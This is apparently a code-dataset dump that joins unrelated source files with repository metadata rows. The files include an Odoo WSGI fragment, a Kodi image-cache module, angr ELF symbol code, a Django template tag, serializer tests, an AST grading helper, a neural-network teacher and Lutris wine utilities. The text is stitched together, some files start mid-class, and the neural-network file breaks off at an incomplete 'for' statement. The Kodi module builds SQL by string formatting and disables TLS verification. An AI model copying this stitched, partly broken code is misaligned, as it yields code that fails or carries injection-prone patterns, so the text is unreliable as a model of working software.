super(WSGIServer, self).__init__((interface, port), self.load(
proxy_mode=proxy_mode,
rules=rules,
newrelic_agent=newrelic_agent
), log=_logger, **kwargs)
def load(self, proxy_mode=False, rules=None, newrelic_agent=None):
_logger.info("Loading Odoo WSGI application")
application = odoo_application
if config['debug_mode']:
application = DebuggedApplication(application, evalex=True)
_logger.warning("Debugger enabled, do not use in production")
if newrelic_agent:
application = newrelic_agent.WSGIApplicationWrapper(application)
_logger.info("New Relic enabled")
if rules and rules.has_rules():
application = rules(application)
_logger.info("Rewrites enabled")
if proxy_mode:
application = ProxyFix(application)
_logger.info("Proxy mode enabled")
return application
|
apache-2.0
| -1,330,788,283,459,864,000 | 29.867925 | 78 | 0.659535 | false |
rvlad1987/repository.rvlad1987.xbmc-addons
|
matrix/source/plugin.video.filmix.net.dev/core/image_loader.py
|
1
|
8009
|
# -*- coding: utf-8 -*-
# Used in
# http.py - format_poster_link()
# list.py - add_movies()
import xbmcvfs
import xbmcup.app, xbmcup.net
from .xbmcup.db import SQL
from .xbmcup.system import FS
from .image_size import get_image_size_from_bytesio
from .auth import Auth
from .defines import *
# https://github.com/xbmc/xbmc/blob/master/xbmc/utils/Crc32.cpp
class KodiCrc32:
crc_tab = [
0x00000000, 0x04C11DB7, 0x09823B6E, 0x0D4326D9,
0x130476DC, 0x17C56B6B, 0x1A864DB2, 0x1E475005,
0x2608EDB8, 0x22C9F00F, 0x2F8AD6D6, 0x2B4BCB61,
0x350C9B64, 0x31CD86D3, 0x3C8EA00A, 0x384FBDBD,
0x4C11DB70, 0x48D0C6C7, 0x4593E01E, 0x4152FDA9,
0x5F15ADAC, 0x5BD4B01B, 0x569796C2, 0x52568B75,
0x6A1936C8, 0x6ED82B7F, 0x639B0DA6, 0x675A1011,
0x791D4014, 0x7DDC5DA3, 0x709F7B7A, 0x745E66CD,
0x9823B6E0, 0x9CE2AB57, 0x91A18D8E, 0x95609039,
0x8B27C03C, 0x8FE6DD8B, 0x82A5FB52, 0x8664E6E5,
0xBE2B5B58, 0xBAEA46EF, 0xB7A96036, 0xB3687D81,
0xAD2F2D84, 0xA9EE3033, 0xA4AD16EA, 0xA06C0B5D,
0xD4326D90, 0xD0F37027, 0xDDB056FE, 0xD9714B49,
0xC7361B4C, 0xC3F706FB, 0xCEB42022, 0xCA753D95,
0xF23A8028, 0xF6FB9D9F, 0xFBB8BB46, 0xFF79A6F1,
0xE13EF6F4, 0xE5FFEB43, 0xE8BCCD9A, 0xEC7DD02D,
0x34867077, 0x30476DC0, 0x3D044B19, 0x39C556AE,
0x278206AB, 0x23431B1C, 0x2E003DC5, 0x2AC12072,
0x128E9DCF, 0x164F8078, 0x1B0CA6A1, 0x1FCDBB16,
0x018AEB13, 0x054BF6A4, 0x0808D07D, 0x0CC9CDCA,
0x7897AB07, 0x7C56B6B0, 0x71159069, 0x75D48DDE,
0x6B93DDDB, 0x6F52C06C, 0x6211E6B5, 0x66D0FB02,
0x5E9F46BF, 0x5A5E5B08, 0x571D7DD1, 0x53DC6066,
0x4D9B3063, 0x495A2DD4, 0x44190B0D, 0x40D816BA,
0xACA5C697, 0xA864DB20, 0xA527FDF9, 0xA1E6E04E,
0xBFA1B04B, 0xBB60ADFC, 0xB6238B25, 0xB2E29692,
0x8AAD2B2F, 0x8E6C3698, 0x832F1041, 0x87EE0DF6,
0x99A95DF3, 0x9D684044, 0x902B669D, 0x94EA7B2A,
0xE0B41DE7, 0xE4750050, 0xE9362689, 0xEDF73B3E,
0xF3B06B3B, 0xF771768C, 0xFA325055, 0xFEF34DE2,
0xC6BCF05F, 0xC27DEDE8, 0xCF3ECB31, 0xCBFFD686,
0xD5B88683, 0xD1799B34, 0xDC3ABDED, 0xD8FBA05A,
0x690CE0EE, 0x6DCDFD59, 0x608EDB80, 0x644FC637,
0x7A089632, 0x7EC98B85, 0x738AAD5C, 0x774BB0EB,
0x4F040D56, 0x4BC510E1, 0x46863638, 0x42472B8F,
0x5C007B8A, 0x58C1663D, 0x558240E4, 0x51435D53,
0x251D3B9E, 0x21DC2629, 0x2C9F00F0, 0x285E1D47,
0x36194D42, 0x32D850F5, 0x3F9B762C, 0x3B5A6B9B,
0x0315D626, 0x07D4CB91, 0x0A97ED48, 0x0E56F0FF,
0x1011A0FA, 0x14D0BD4D, 0x19939B94, 0x1D528623,
0xF12F560E, 0xF5EE4BB9, 0xF8AD6D60, 0xFC6C70D7,
0xE22B20D2, 0xE6EA3D65, 0xEBA91BBC, 0xEF68060B,
0xD727BBB6, 0xD3E6A601, 0xDEA580D8, 0xDA649D6F,
0xC423CD6A, 0xC0E2D0DD, 0xCDA1F604, 0xC960EBB3,
0xBD3E8D7E, 0xB9FF90C9, 0xB4BCB610, 0xB07DABA7,
0xAE3AFBA2, 0xAAFBE615, 0xA7B8C0CC, 0xA379DD7B,
0x9B3660C6, 0x9FF77D71, 0x92B45BA8, 0x9675461F,
0x8832161A, 0x8CF30BAD, 0x81B02D74, 0x857130C3,
0x5D8A9099, 0x594B8D2E, 0x5408ABF7, 0x50C9B640,
0x4E8EE645, 0x4A4FFBF2, 0x470CDD2B, 0x43CDC09C,
0x7B827D21, 0x7F436096, 0x7200464F, 0x76C15BF8,
0x68860BFD, 0x6C47164A, 0x61043093, 0x65C52D24,
0x119B4BE9, 0x155A565E, 0x18197087, 0x1CD86D30,
0x029F3D35, 0x065E2082, 0x0B1D065B, 0x0FDC1BEC,
0x3793A651, 0x3352BBE6, 0x3E119D3F, 0x3AD08088,
0x2497D08D, 0x2056CD3A, 0x2D15EBE3, 0x29D4F654,
0xC5A92679, 0xC1683BCE, 0xCC2B1D17, 0xC8EA00A0,
0xD6AD50A5, 0xD26C4D12, 0xDF2F6BCB, 0xDBEE767C,
0xE3A1CBC1, 0xE760D676, 0xEA23F0AF, 0xEEE2ED18,
0xF0A5BD1D, 0xF464A0AA, 0xF9278673, 0xFDE69BC4,
0x89B8FD09, 0x8D79E0BE, 0x803AC667, 0x84FBDBD0,
0x9ABC8BD5, 0x9E7D9662, 0x933EB0BB, 0x97FFAD0C,
0xAFB010B1, 0xAB710D06, 0xA6322BDF, 0xA2F33668,
0xBCB4666D, 0xB8757BDA, 0xB5365D03, 0xB1F740B4
]
m_crc = None
in_hex = None
def Reset(self):
self.m_crc = 0xFFFFFFFF
def Compute(self, buffer):
self.Reset()
for char in buffer:
self.m_crc = ((self.m_crc << 8) & 0xFFFFFFFF) ^ self.crc_tab[(((self.m_crc >> 24) & 0xFFFFFFFF) ^ ord(char)) & 0xFF]
self.m_crc = self.m_crc
def ComputeFromLowerCase(self, strValue):
strLower = strValue.lower()
self.Compute(strLower)
self.in_hex = '0x{:08x}'.format( self.m_crc )
return self.m_crc
class TexturesSQL(SQL):
def __init__(self, filename):
self._filename = filename
self.db = None
def url_exists(self, url):
sql = "SELECT id FROM texture WHERE url='{}'".format(url)
rows = self.get(sql)
return rows != []
# https://github.com/xbmc/xbmc/blob/master/xbmc/TextureDatabase.cpp
def AddCachedTexture(self, details):
sql = "DELETE FROM texture WHERE url='{}'".format(details.url)
self.set(sql)
date = '' # do not update texture in future
sql = "INSERT INTO texture (url, cachedurl, imagehash, lasthashcheck) VALUES('{}', '{}', '{}', '{}')".format(details.url, details.file, details.hash, date)
lastrowid, rowcount = self.set(sql)
sql = "INSERT INTO sizes (idtexture, size, usecount, lastusetime, width, height) VALUES({}, 1, 1, CURRENT_TIMESTAMP, {}, {})".format(lastrowid, details.width, details.height)
self.set(sql)
class ImageDetails:
url = ''
file = '' # cachedurl
hash = '' # imagehash
width = 0
height = 0
file_path = ''
size = 0
def __init__(self, url):
self.url = url
self.crc = KodiCrc32()
self.fs = FS()
self.get_cache_file_name()
# https://github.com/xbmc/xbmc/blob/master/xbmc/TextureCacheJob.cpp
def get_image_hash(self):
self.hash = "BADHASH"
st = xbmcvfs.Stat(self.file_path)
time = st.st_mtime()
self.size = st.st_size()
if time == None:
time = st.st_ctime()
if time or self.size:
self.hash = 'd' + str(time) + 's' + str(self.size)
return self.hash
return self.hash
def get_cache_file_name(self):
self.crc.ComputeFromLowerCase(self.url)
fname = self.crc.in_hex[2:] + self.url[-4:]
self.file = fname[0] + '/' + fname
self.file_path = self.fs._path( 'thumbnails://' + self.file )
return self.file_path
def get_image_size(self):
try:
fn = self.file_path.decode('utf8') if IS_WIN_PLATFORM else self.file_path
input = open(fn, 'rb')
self.width, self.height = get_image_size_from_bytesio(input, self.size)
input.close()
except:
print traceback.format_exc()
return None
def get_image_info(self):
self.get_image_hash()
self.get_image_size()
class ImageLoader:
def __init__(self):
self.fs = FS()
self.db = TexturesSQL( self.fs._path( 'database://Textures13.db' ) )
def load_to_cache(self, url):
if self.db.url_exists(url):
return True
self.details = ImageDetails(url)
if not self.fs.exists(self.details.file_path):
try:
self.auth = Auth()
self.cookie = self.auth.get_cookies()
cook = self.mycookie if self.cookie == None else self.cookie
response = xbmcup.net.http.get(url, cookies=cook, verify=False, proxies=PROXIES)
if(self.cookie == None):
self.mycookie = response.cookies
except xbmcup.net.http.exceptions.RequestException:
print traceback.format_exc()
else:
if(response.status_code == 200):
file = self.fs.file(self.details.file_path, "w")
file.write(response.content)
file.close()
self.details.get_image_info()
self.db.AddCachedTexture(self.details)
|
gpl-2.0
| -6,628,772,293,520,631,000 | 36.083333 | 182 | 0.637408 | false |
Ruide/angr-dev
|
cle/cle/backends/elf/symbol.py
|
1
|
2191
|
from ..symbol import Symbol
from ...address_translator import AT
class ELFSymbol(Symbol):
"""
Represents a symbol for the ELF format.
:ivar str elftype: The type of this symbol as an ELF enum string
:ivar str binding: The binding of this symbol as an ELF enum string
:ivar section: The section associated with this symbol, or None
"""
def __init__(self, owner, symb):
realtype = owner.arch.translate_symbol_type(symb.entry.st_info.type)
if realtype == 'STT_FUNC':
symtype = Symbol.TYPE_FUNCTION
elif realtype == 'STT_OBJECT':
symtype = Symbol.TYPE_OBJECT
elif realtype == 'STT_SECTION':
symtype = Symbol.TYPE_SECTION
elif realtype == 'STT_NOTYPE':
symtype = Symbol.TYPE_NONE
else:
symtype = Symbol.TYPE_OTHER
sec_ndx, value = symb.entry.st_shndx, symb.entry.st_value
# A relocatable object's symbol's value is relative to its section's addr.
if owner.is_relocatable and isinstance(sec_ndx, (int, long)):
value += owner.sections[sec_ndx].remap_offset
super(ELFSymbol, self).__init__(owner,
symb.name,
AT.from_lva(value, owner).to_rva(),
symb.entry.st_size,
symtype)
self.elftype = realtype
self.binding = symb.entry.st_info.bind
self.section = sec_ndx if type(sec_ndx) is not str else None
self.is_static = self.type == Symbol.TYPE_SECTION or sec_ndx == 'SHN_ABS'
self.is_common = sec_ndx == 'SHN_COMMON'
self.is_weak = self.binding == 'STB_WEAK'
# these do not appear to be 100% correct, but they work so far...
# e.g. the "stdout" import symbol will be marked as an export symbol by this
# there does not seem to be a good way to reliably isolate import symbols
self.is_import = self.section is None and self.binding in ('STB_GLOBAL', 'STB_WEAK')
self.is_export = self.section is not None and self.binding in ('STB_GLOBAL', 'STB_WEAK')
|
bsd-2-clause
| -9,152,794,862,424,601,000 | 44.645833 | 96 | 0.584665 | false |
featherweightweb/django-composer
|
composer/templatetags/composer.py
|
1
|
5201
|
"""
composer.py
"""
from django import template
from django.conf import settings
from django.core.urlresolvers import reverse
from ..models import Element
register = template.Library()
class LazyContent:
"""
Wrapper around a `NodeList` that is lazily-evaluated to a string.
"""
def __init__(self, nodelist, context):
self.nodelist = nodelist
self.context = context
def __str__(self):
return self.nodelist.render(self.context)
def serialize_context(context):
"""
Serializes a dictionary, list, or object into an easy to read example of the
context.
"""
if type(context) == dict:
return '\n'.join(['%s = %r' % (key, val) for key, val in context.items()])
if type(context) == list:
result = 'list of %d elements' % len(context)
for i, e in enumerate(context[0:15]):
result += '\n%2d = %r' % (i, e)
if len(context) > 15:
result += '\n ...\n%2d = %r' % (len(context), context[-1])
return result
if context is not None or context != {}:
result = 'object: ' + repr(context)
return ''
class ComposerNode(template.Node):
def __init__(self, name, content=None, nodelist=None, context_var=None, dynamic=False):
self.name = name
self.content = content
self.nodelist = nodelist
self.dynamic = dynamic
if context_var is not None:
self.context_var = template.Variable(context_var)
else:
self.context_var = None
def render(self, context):
"""
The `template_name` context variable must be present.
"""
if self.nodelist:
self.content = LazyContent(self.nodelist, context)
template = context.get('template_name', None)
elements = context.get('composer_elements', None)
if template is None or elements is None:
return str(self.content)
has_perm = context.get('can_compose_permission', False)
el_context = {}
if self.context_var is not None:
el_context = self.context_var.resolve(context)
if self.name not in elements:
context['composer_elements'][self.name] = Element.objects.create(
template_name=template,
name=self.name,
is_dynamic=self.dynamic,
context_example=serialize_context(el_context),
content=str(self.content))
element = elements[self.name]
try:
result = element.render(self.content, el_context)
except Exception as e:
if has_perm:
result = str(e)
else:
result = element.content
if has_perm:
url = reverse('composer-edit-element', kwargs={'pk': element.id})
result = '<div class="edit-composer-button">edit</div>' + result
result = '<div class="edit-composer-element" data-url="%s" data-name="%s">%s</div>' % (
url, self.name, result)
return result
def strip_quotes(val):
quotes = ("'", '"')
if type(val) == str and val[0] in quotes and val[-1] in quotes:
return val[1:-1]
return val
@register.tag(name='composer_dynamic')
def do_composer_dynamic(parser, token):
"""
This tag expects the following format:
{% composer_dynamic 'name' context_var %}
This is the default template, which can use {% if blah %}context {{vars}}{% endif %}
{% endcomposer %}
The second argument is optional.
"""
bits = token.split_contents()
name, context_var = None, None
try:
if len(bits) == 2:
_, name = bits
else:
_, name, context_var = bits
except ValueError:
raise template.TemplateSyntaxError(
'%r tag requires either 1 or 2 arguments' % token.contents.split()[0])
name = strip_quotes(name)
nodelist = parser.parse(('endcomposer',))
parser.delete_first_token()
return ComposerNode(name, nodelist=nodelist, context_var=context_var, dynamic=True)
@register.tag(name='composer_static')
def do_composer_static(parser, token):
"""
This tag expects the following format:
{% composer_static 'name' %}Some static default content.{% endcomposer %}
"""
try:
_, name = token.split_contents()
except ValueError:
raise template.TemplateSyntaxError(
'%r tag requires exactly 1 argument' % token.contents.split()[0])
name = strip_quotes(name)
nodelist = parser.parse(('endcomposer',))
parser.delete_first_token()
return ComposerNode(name, nodelist=nodelist)
@register.simple_tag(takes_context=True)
def composer_includes(context):
"""
Include the composer JS and CSS files in a page if the user has permission.
"""
if context.get('can_compose_permission', False):
url = settings.STATIC_URL
url += '' if url[-1] == '/' else '/'
js = '<script type="text/javascript" src="%sjs/composer.min.js"></script>' % url
css = '<link rel="stylesheet" type="text/css" href="%scss/composer.css">' % url
return js + css
return ''
|
mit
| -3,234,653,981,534,419,500 | 29.775148 | 99 | 0.592386 | false |
openaid-IATI/OIPA
|
OIPA/api/country/tests/test_country_serializers.py
|
1
|
3343
|
from unittest import skip
from django.contrib.gis.geos import Point
from django.test import RequestFactory, TestCase
from api.country import serializers
from geodata.factory import geodata_factory
class TestCountrySerializers(TestCase):
request_dummy = RequestFactory().get('/')
@skip
def test_CountrySerializer(self):
country = geodata_factory.CountryFactory.build(
code='NL',
name='Netherlands',
alt_name='Nederland',
language='en',
dac_country_code=1,
iso3='NLD',
alpha3='NLD',
fips10='FIPS',
center_longlat=Point(5.45, 52.3),
)
serializer = serializers.CountrySerializer(
country,
context={'request': self.request_dummy}
)
assert serializer.data['code'] == country.code,\
"""
'country.code' should be serialized to a field called 'code'
"""
assert serializer.data['name'] == country.name,\
"""
'country.name' should be serialized to a field called 'name'
"""
assert serializer.data[
'numerical_code_un'
] == country.numerical_code_un,\
"""
'country.numerical_code_un' should be serialized to a field called
'numerical_code_un'
"""
assert serializer.data['name'] == country.name,\
"""
'country.name' should be serialized to a field called 'name'
"""
assert serializer.data['alt_name'] == country.alt_name,\
"""
'country.alt_name' should be serialized to a field called
'alt_name'
"""
assert serializer.data['language'] == country.language,\
"""
'country.language' should be serialized to a field called
'language'
"""
assert serializer.data[
'dac_country_code'
] == country.dac_country_code,\
"""
'country.dac_country_code' should be serialized to a field called
'dac_country_code'
"""
assert serializer.data['iso3'] == country.iso3,\
"""
'country.iso3' should be serialized to a field called 'iso3'
"""
assert serializer.data['alpha3'] == country.alpha3,\
"""
'country.alpha3' should be serialized to a field called 'alpha3'
"""
assert serializer.data['fips10'] == country.fips10,\
"""
'country.fips10' should be serialized to a field called 'fips10'
"""
required_fields = (
'url',
'code',
'pk',
'numerical_code_un',
'name',
'alt_name',
'language',
'region',
'un_region',
'unesco_region',
'dac_country_code',
'iso3',
'alpha3',
'fips10',
'data_source',
'activities',
'location',
'polygon',
)
assertion_msg = "the field '{0}' should be in the serialized country"
for field in required_fields:
assert field in serializer.data, assertion_msg.format(field)
|
agpl-3.0
| -422,782,868,062,683,260 | 31.77451 | 78 | 0.512115 | false |
russross/codegrinder
|
files/python3unittest/tests/asttest.py
|
1
|
9348
|
import ast
import os
import sys
import trace
import unittest
class ASTTest(unittest.TestCase):
def setUp(self, filename, parse_file=True):
"""Stores the raw text of the student submission, the lines that were
printed when executing the student submission, and the AST tree of the
submission."""
self.filename = filename
self.printed_lines = []
f = open(filename)
text = f.read()
self.file = text
if parse_file:
self.tree = ast.parse(text)
f.close()
def find_all(self, node_type, start_node=None):
"""Returns all of the AST nodes matching the given node type. Optional
start_node parameter allows walking a specific portion of the original
tree. TODO: list common node types here for easy access."""
if start_node is None:
start_node = self.tree
nodes = []
for node in ast.walk(start_node):
if isinstance(node, node_type):
nodes.append(node)
return nodes
def print_replacement(self, *text, **kwargs):
"""Saves printed lines to a data member. Used by exec_solution, not
usually necessary in any specific test."""
self.printed_lines += text
def exec_solution(self):
"""Executes the student submission."""
print = self.print_replacement
exec(self.file)
def debug_tree(self):
"""Converts the AST tree for manual traversal. Not really necessary
with find_all."""
return ast.dump(self.tree)
def get_function_calls(self, start_node=None):
"""Helper to find all of the function calls in the submission."""
names = []
for func in self.find_all(ast.Call, start_node):
if isinstance(func.func, ast.Name):
names.append(func.func.id)
return names
def find_function_calls(self, func_name):
"""Finds all of the function calls that match a certain name and
returns their nodes."""
calls = []
for call in self.find_all(ast.Call):
if isinstance(call.func, ast.Name) and call.func.id == func_name:
calls.append(call)
return calls
def get_method_calls(self, start_node=None):
"""Helper to find all of the function calls in the submission."""
names = []
for func in self.find_all(ast.Call, start_node):
if isinstance(func.func, ast.Attribute):
names.append(func.func.attr)
return names
def find_method_calls(self, func_name):
"""Finds all of the method calls that match a certain name and returns
their nodes."""
calls = []
for call in self.find_all(ast.Call):
if isinstance(call.func, ast.Attribute) and call.func.attr == func_name:
calls.append(call)
return calls
def match_signature(self, funcname, argc):
"""Finds and returns the function definition statement that matches the
given function name and argument count. If it can't find a
corresponding function definition, it returns None."""
for func in self.find_all(ast.FunctionDef):
if func.name == funcname and len(func.args.args) == argc:
return func
return None
def assert_prints(self, lines=1, msg="You are not printing anything!"):
"""Assert helper testing the number of printed lines."""
self.assertGreaterEqual(len(self.printed_lines), 1, msg)
def function_prints(self, func_def_node):
"""Checks whether the given function has been defined to print or not."""
calls_in_func = self.find_all(ast.Call, func_def_node)
for call in calls_in_func:
if call.func.id == "print":
return True
return False
def get_function_linenos(self):
linenos = {}
for funcdef in self.find_all(ast.FunctionDef):
linenos[funcdef.name] = {
"start": funcdef.lineno,
"end": get_function_end_lineno(funcdef),
}
return linenos
def ensure_coverage(self, function_names, min_coverage):
"""Checks whether the student has written enough unit tests to cover a
significant portion of their solution. Note: super hacky... Also, you
might want to patch stdout for tests that use this."""
basename = self.filename.split('.')[0]
# build a tracer to trace the execution of the student's solution
tracer = trace.Trace(
ignoremods=['asttest'],
ignoredirs=[sys.prefix, sys.exec_prefix])
def trigger(basename):
"""Helper function to import student's solution and thus, evaluate it"""
import importlib
# import solution
m = importlib.import_module(basename)
# reload it to force evaluating it (in case already imported elsewhere)
importlib.reload(m)
# run the helper function (trigger) to trigger evaluation of the solution
tracer.runfunc(trigger, basename)
# write tracing results to a *.cover file
tracer.results().write_results(coverdir='.')
# count how many lines were skipped
all_skipped = []
f = open(basename+".cover")
lineno = 0
for line in f:
lineno += 1
if line[:6] == ">>>>>>":
# skipped line
all_skipped.append((line[8:], lineno))
f.close()
# clean up cover file
os.remove(basename+".cover")
# count executable lines
visitor = FindExecutableLines()
visitor.visit(self.tree)
all_executable_lines = set(visitor.lines)
# compare skipped lines with actual lines
total_lines = 0
skipped_lines = []
executable_lines = []
linenos = self.get_function_linenos()
for funcname in function_names:
self.assertIn(funcname, linenos, "Function {} is not "
"defined.".format(funcname))
start = linenos[funcname]["start"]
end = linenos[funcname]["end"]
# count executable lines (can't just subtract start from end
# because that includes lines that don't show up in the trace)
for lineno in all_executable_lines:
if lineno in range(start+1, end+1):
total_lines += 1
# count skipped lines
for (line, lineno) in all_skipped:
if lineno in range(start+1, end+1):
skipped_lines.append(line)
self.assertGreater((total_lines-len(skipped_lines))/total_lines, min_coverage,
"Your test coverage is not adequate. Write tests that cover "
"all possible outcomes of your function. Here are the lines "
"that weren't covered:\n\n" + '\n'.join(skipped_lines))
def is_top_level(self, node):
"""Determines if a node is at the top-level of the program."""
for elt in self.tree.body:
if isinstance(elt, ast.Expr):
if elt.value == node:
return True
elif elt == node:
return True
return False
def get_function_end_lineno(funcdef):
"""Given an ast.FunctionDef node, returns the line number of the last line
in the function. I only wrote this since I found out too late the
end_lineno attribute was only introduced in Python 3.8, which we aren't
currently using."""
if sys.version_info[0] >= 3 and sys.version_info[1] >= 8:
return funcdef.end_lineno
last = funcdef.body[-1]
while isinstance(last, (ast.For, ast.While, ast.If)):
last = last.body[-1]
return last.lineno
class FindExecutableLines(ast.NodeVisitor):
"""
taken from pedal
- (https://github.com/pedal-edu/pedal/blob/f3c195a2da9416745ad9122ec0e69d3d75d59866/pedal/sandbox/commands.py#L297)
- (https://github.com/pedal-edu/pedal/blob/f3c195a2da9416745ad9122ec0e69d3d75d59866/pedal/utilities/ast_tools.py#L147)
NodeVisitor subclass that visits every statement of a program and tracks
their line numbers in a list.
Attributes:
lines (list[int]): The list of lines that were visited.
"""
def __init__(self):
self.lines = []
def _track_lines(self, node):
self.lines.append(node.lineno)
self.generic_visit(node)
visit_FunctionDef = _track_lines
visit_AsyncFunctionDef = _track_lines
visit_ClassDef = _track_lines
visit_Return = _track_lines
visit_Delete = _track_lines
visit_Assign = _track_lines
visit_AugAssign = _track_lines
visit_AnnAssign = _track_lines
visit_For = _track_lines
visit_AsyncFor = _track_lines
visit_While = _track_lines
visit_If = _track_lines
visit_With = _track_lines
visit_AsyncWith = _track_lines
visit_Raise = _track_lines
visit_Try = _track_lines
visit_Assert = _track_lines
visit_Import = _track_lines
visit_ImportFrom = _track_lines
visit_Global = _track_lines
visit_Nonlocal = _track_lines
visit_Expr = _track_lines
visit_Pass = _track_lines
visit_Continue = _track_lines
visit_Break = _track_lines
|
agpl-3.0
| -8,695,240,081,531,041,000 | 38.443038 | 126 | 0.607082 | false |
navjeet0211/Mara
|
ANN/Learn.py
|
1
|
2320
|
#!/usr/bin/python
# -*- coding: ISO-8859-1 -*-
"""
Mara.ANN.Learn (v. 0.1):
Learning algorithms for neural networks.
Author: Martti Louhivuori (martti.louhivuori@helsinki.fi)
Date: 14.2.2006
"""
class Teacher:
def __init__(self, net, method='bp', targets=None, rate=1,
gradient_delta=0.1):
self.net = net
self.method = method
self.targets = targets
self.rate = rate
self.__valid_methods__ = ['bp']
self.__gradient_delta__ = gradient_delta
def get_valid_methods(self):
return self.__valid_methods__
def set_gradient_delta(self, delta):
self.__gradient_delta__ = delta
def get_gradient_delta(self):
return self.__gradient_delta__
def teach(self, net=None, targets=None):
if net is None:
net = self.net
if targets is None:
targets = self.targets
errors = []
for neuron,target in zip(net.layers['output'], targets):
errors.append(float(target-neuron.status()))
total_error = 0
for e in errors:
total_error += e**2
total_error /= 2
done = []
current = []
for neuron,error in zip(net.layers['output'],errors):
signal = neuron.input_signal()
neuron.gradient = error*neuron.evolve(signal+self.__gradient_delta__)/self.__gradient_delta__
done.append(neuron)
for k in neuron.inputs.keys():
if k not in current:
current.append(k)
while len(current) > 0:
next = []
for n in current:
if n not in done:
signal = n.input_signal()
delta = n.evolve(signal+self.__gradient_delta__)/self.__gradient_delta__
sum = 0
for o in n.outputs:
sum += o.gradient*o.inputs[n]['weight']
o.inputs[n]['weight'] += self.rate*o.gradient*n.status()
n.gradient = delta*sum
for k in n.inputs.keys():
if k not in next:
next.append(k)
done.append(n)
current = next
tree = []
for
|
gpl-2.0
| 3,202,342,299,023,073,000 | 30.351351 | 105 | 0.496552 | false |
lutris/lutris
|
lutris/util/wine/wine.py
|
1
|
15483
|
"""Utilities for manipulating Wine"""
import os
from collections import OrderedDict
from functools import lru_cache
from gettext import gettext as _
from lutris import runtime, settings
from lutris.gui.dialogs import DontShowAgainDialog, ErrorDialog
from lutris.runners.steam import steam
from lutris.util import linux, system
from lutris.util.log import logger
from lutris.util.strings import parse_version, version_sort
from lutris.util.wine import fsync
WINE_DIR = os.path.join(settings.RUNNER_DIR, "wine")
WINE_DEFAULT_ARCH = "win64" if linux.LINUX_SYSTEM.is_64_bit else "win32"
WINE_PATHS = {
"winehq-devel": "/opt/wine-devel/bin/wine",
"winehq-staging": "/opt/wine-staging/bin/wine",
"wine-development": "/usr/lib/wine-development/wine",
"system": "wine",
}
ESYNC_LIMIT_CHECK = os.environ.get("ESYNC_LIMIT_CHECK", "").lower()
FSYNC_SUPPORT_CHECK = os.environ.get("FSYNC_SUPPORT_CHECK", "").lower()
def get_playonlinux():
"""Return the folder containing PoL config files"""
pol_path = os.path.expanduser("~/.PlayOnLinux")
if system.path_exists(os.path.join(pol_path, "wine")):
return pol_path
return None
def _iter_proton_locations():
"""Iterate through all existing Proton locations"""
for path in [os.path.join(p, "common") for p in steam().get_steamapps_dirs()]:
if os.path.isdir(path):
yield path
for path in [os.path.join(p, "") for p in steam().get_steamapps_dirs()]:
if os.path.isdir(path):
yield path
def get_proton_paths():
"""Get the Folder that contains all the Proton versions. Can probably be improved"""
paths = set()
for path in _iter_proton_locations():
proton_versions = [p for p in os.listdir(path) if "Proton" in p]
for version in proton_versions:
if system.path_exists(os.path.join(path, version, "dist/bin/wine")):
paths.add(path)
return list(paths)
POL_PATH = get_playonlinux()
def detect_arch(prefix_path=None, wine_path=None):
"""Given a Wine prefix path, return its architecture"""
arch = detect_prefix_arch(prefix_path)
if arch:
return arch
if wine_path and system.path_exists(wine_path + "64"):
return "win64"
return "win32"
def detect_prefix_arch(prefix_path=None):
"""Return the architecture of the prefix found in `prefix_path`.
If no `prefix_path` given, return the arch of the system's default prefix.
If no prefix found, return None."""
if not prefix_path:
prefix_path = "~/.wine"
prefix_path = os.path.expanduser(prefix_path)
registry_path = os.path.join(prefix_path, "system.reg")
if not os.path.isdir(prefix_path) or not os.path.isfile(registry_path):
# No prefix_path exists or invalid prefix
logger.debug("Prefix not found: %s", prefix_path)
return None
with open(registry_path, "r") as registry:
for _line_no in range(5):
line = registry.readline()
if "win64" in line:
return "win64"
if "win32" in line:
return "win32"
logger.debug("Failed to detect Wine prefix architecture in %s", prefix_path)
return None
def set_drive_path(prefix, letter, path):
"""Changes the path to a Wine drive"""
dosdevices_path = os.path.join(prefix, "dosdevices")
if not system.path_exists(dosdevices_path):
raise OSError("Invalid prefix path %s" % prefix)
drive_path = os.path.join(dosdevices_path, letter + ":")
if system.path_exists(drive_path):
os.remove(drive_path)
logger.debug("Linking %s to %s", drive_path, path)
os.symlink(path, drive_path)
def use_lutris_runtime(wine_path, force_disable=False):
"""Returns whether to use the Lutris runtime.
The runtime can be forced to be disabled, otherwise it's disabled
automatically if Wine is installed system wide.
"""
if force_disable or runtime.RUNTIME_DISABLED:
logger.info("Runtime is forced disabled")
return False
if WINE_DIR in wine_path:
logger.debug("%s is provided by Lutris, using runtime", wine_path)
return True
if is_installed_systemwide():
logger.info("Using system wine version, not using runtime")
return False
logger.debug("Using Lutris runtime for wine")
return True
def is_mingw_build(wine_path):
"""Returns whether a wine build is built with MingW"""
base_path = os.path.dirname(os.path.dirname(wine_path))
# A MingW build has an .exe file while a GCC one will have a .so
return system.path_exists(os.path.join(base_path, "lib/wine/iexplore.exe"))
def is_gstreamer_build(wine_path):
"""Returns whether a wine build ships with gstreamer libraries.
This allows to set GST_PLUGIN_SYSTEM_PATH_1_0 for the builds that support it.
"""
base_path = os.path.dirname(os.path.dirname(wine_path))
return system.path_exists(os.path.join(base_path, "lib64/gstreamer-1.0"))
def is_installed_systemwide():
"""Return whether Wine is installed outside of Lutris"""
for build in WINE_PATHS.values():
if system.find_executable(build):
# if wine64 is installed but not wine32, don't consider it
# a system-wide installation.
if (
build == "wine" and system.path_exists("/usr/lib/wine/wine64")
and not system.path_exists("/usr/lib/wine/wine")
):
logger.warning("wine32 is missing from system")
return False
return True
return False
def get_system_wine_versions():
"""Return the list of wine versions installed on the system"""
versions = []
for build in sorted(WINE_PATHS.keys()):
version = get_wine_version(WINE_PATHS[build])
if version:
versions.append(build)
return versions
def get_lutris_wine_versions():
"""Return the list of wine versions installed by lutris"""
versions = []
if system.path_exists(WINE_DIR):
dirs = version_sort(os.listdir(WINE_DIR), reverse=True)
for dirname in dirs:
if is_version_installed(dirname):
versions.append(dirname)
return versions
def get_proton_versions():
"""Return the list of Proton versions installed in Steam"""
versions = []
for proton_path in get_proton_paths():
proton_versions = [p for p in os.listdir(proton_path) if "Proton" in p]
for version in proton_versions:
path = os.path.join(proton_path, version, "dist/bin/wine")
if os.path.isfile(path):
versions.append(version)
return versions
def get_pol_wine_versions():
"""Return the list of wine versions installed by Play on Linux"""
if not POL_PATH:
return []
versions = []
for arch in ['x86', 'amd64']:
builds_path = os.path.join(POL_PATH, "wine/linux-%s" % arch)
if not system.path_exists(builds_path):
continue
for version in os.listdir(builds_path):
if system.path_exists(os.path.join(builds_path, version, "bin/wine")):
